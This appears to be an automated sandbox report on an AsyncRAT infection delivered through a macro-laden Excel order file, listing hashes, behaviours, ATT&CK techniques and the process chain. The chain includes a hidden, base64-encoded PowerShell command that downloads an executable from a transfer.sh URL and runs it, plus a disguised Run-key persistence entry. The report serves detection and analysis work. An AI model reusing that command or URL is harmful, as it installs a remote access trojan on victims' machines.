asyncrat | 06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed

General

Target

ORDER 002110109A.xlsm
Size

388KB
MD5

fddb915231bd05bdb40250bd9ca9327a
SHA1

95e69dffccc8c93611de153fd9993faefc4b0f5f
SHA256

06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed
SHA512

da06766a2de1c0008ee9ed1d575bf8500a09ba511d056beb2c84e44ce7457d7e319c156695176de87247ca7faac68ea65af6216d47075f67341e6c2b61b13b43

Score

10^/10

asyncrat persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfer.sh/get/ii6Fqb/word.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1884	804	cmd.exe	EXCEL.EXE

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2676-334-0x000000000040C75E-mapping.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

53 1240 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Kgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exe

pid process

744 Kgwugrfmaukbcbkgumu.exe
2676 Kgwugrfmaukbcbkgumu.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

804 EXCEL.EXE

flow	pid	process
53	1240	powershell.exe

pid	process
744	Kgwugrfmaukbcbkgumu.exe
2676	Kgwugrfmaukbcbkgumu.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Kgwugrfmaukbcbkgumu.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox.exe\""	Kgwugrfmaukbcbkgumu.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Kgwugrfmaukbcbkgumu.exe

description pid process target process

PID 744 set thread context of 2676 744 Kgwugrfmaukbcbkgumu.exe Kgwugrfmaukbcbkgumu.exe

description	pid	process	target process
PID 744 set thread context of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\97E47F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

804 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exeKgwugrfmaukbcbkgumu.exe

pid process

1240 powershell.exe
1240 powershell.exe
1240 powershell.exe
744 Kgwugrfmaukbcbkgumu.exe
744 Kgwugrfmaukbcbkgumu.exe
744 Kgwugrfmaukbcbkgumu.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

804 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\97E47F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
1240	powershell.exe
1240	powershell.exe
1240	powershell.exe
744	Kgwugrfmaukbcbkgumu.exe
744	Kgwugrfmaukbcbkgumu.exe
744	Kgwugrfmaukbcbkgumu.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exe

description	pid	process
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	744	Kgwugrfmaukbcbkgumu.exe
Token: SeDebugPrivilege	2676	Kgwugrfmaukbcbkgumu.exe

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

EXCEL.EXE

pid	process
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE
804	EXCEL.EXE

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeKgwugrfmaukbcbkgumu.exe

description	pid	process	target process
PID 804 wrote to memory of 1884	804	EXCEL.EXE	cmd.exe
PID 804 wrote to memory of 1884	804	EXCEL.EXE	cmd.exe
PID 1884 wrote to memory of 1240	1884	cmd.exe	powershell.exe
PID 1884 wrote to memory of 1240	1884	cmd.exe	powershell.exe
PID 1240 wrote to memory of 744	1240	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 1240 wrote to memory of 744	1240	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 1240 wrote to memory of 744	1240	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 744 wrote to memory of 2676	744	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER 002110109A.xlsm"
1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Wzjokpltbfr.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBLAGcAdwB1AGcAcgBmAG0AYQB1AGsAYgBjAGIAawBnAHUAbQB1AC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBpAGkANgBGAHEAYgAvAHcAbwByAGQALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1240

C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
"C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kgwugrfmaukbcbkgumu.exe.log
MD5
605f809fab8c19729d39d075f7ffdb53

SHA1
c546f877c9bd53563174a90312a8337fdfc5fdd9

SHA256
6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

SHA512
82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
MD5
4adb3a47d33b76506499d2be6b60351a

SHA1
5305fdc90c3ba06867d3765e826c1fa1312d7e0f

SHA256
d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2

SHA512
9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

Download Submit
C:\Users\Admin\Documents\Wzjokpltbfr.bat
MD5
29e9b22feef3c9266a3228072aff9cca

SHA1
a7632e340c2929ed5dace6c266250cebc3c13ab2

SHA256
04f1edaab7365adc160f7a50e9376ae3cfa717900765fad12fbd67c5fc767684

SHA512
775587f577aa0be54a33ecac0ded78d4780cfeca3973867f296c543f37f21008e353772c096d4e4992298a995868a4715197950976dde2b3f55339c6d8c49f82

Download Submit
memory/744-321-0x0000000000000000-mapping.dmp

Download
memory/744-340-0x0000000005380000-0x0000000005381000-memory.dmp

Filesize
4KB

Download
memory/804-114-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp

Filesize
64KB

Download
memory/804-117-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp

Filesize
64KB

Download
memory/804-120-0x000001F12FE10000-0x000001F12FE12000-memory.dmp

Filesize
8KB

Download
memory/804-121-0x000001F12FE10000-0x000001F12FE12000-memory.dmp

Filesize
8KB

Download
memory/804-115-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp

Filesize
64KB

Download
memory/804-116-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp

Filesize
64KB

Download
memory/804-118-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp

Filesize
64KB

Download
memory/804-119-0x000001F12FE10000-0x000001F12FE12000-memory.dmp

Filesize
8KB

Download
memory/1240-292-0x0000000000000000-mapping.dmp

Download
memory/1240-312-0x0000021C37D36000-0x0000021C37D38000-memory.dmp

Filesize
8KB

Download
memory/1240-302-0x0000021C37D33000-0x0000021C37D35000-memory.dmp

Filesize
8KB

Download
memory/1240-301-0x0000021C37D30000-0x0000021C37D32000-memory.dmp

Filesize
8KB

Download
memory/1884-290-0x0000000000000000-mapping.dmp

Download
memory/2676-334-0x000000000040C75E-mapping.dmp

Download
memory/2676-341-0x00000000052E0000-0x00000000052E1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads